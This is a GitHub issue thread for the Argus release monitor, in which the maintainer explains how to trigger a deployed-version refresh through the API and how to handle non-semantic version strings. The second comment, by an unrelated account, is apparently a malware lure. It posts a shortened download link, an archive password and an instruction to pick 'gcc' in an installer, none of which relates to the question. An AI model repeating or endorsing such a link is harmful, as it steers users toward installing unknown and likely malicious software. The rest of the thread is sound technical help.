### ISSUE TITLE
question: How to refresh versions with API query

### ISSUE THREAD

**Issue by PedroBuffon** [release-argus/Argus#425]
So i started using argus about a week now, awesome software, so i changed the way webhooks supposed to be used and i send a webhook to n8n with headers for service name to make n8n update the container,  is there a way to make argus recheck the version by receiving a webhook in POST or api call back from n8n after the update is completed? or that isn`t implemented yet?

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by JosephKav** [comment]
You can call a refresh like you can in the web UI with a GET request to `/api/v1/deployed_version/refresh/SERVICE_NAME`

**Comment by PedroBuffon** [comment]
Awesome!!!! I`ll update my workflow, thanks!!!!

**Comment by PedroBuffon** [comment]
yeah, api won`t work with no semantic versions, it gives out a error "failed converting "4.0.9.2278" to a semantic version." this version is for sonarr, so i need to "manually" convert it?

**Comment by JosephKav** [comment]
I'll fix that in the API at some point, but you can get around that by adding `?semantic_versioning=false` to the url

**Comment by JosephKav** [comment]
With 9400ea2 and a small fix in 70c0625, specifying no `?semantic_version`, should have it use the value that the service has. `?semantic_version=null` would have it use the global default.
I'll close this issue and start a release for this now
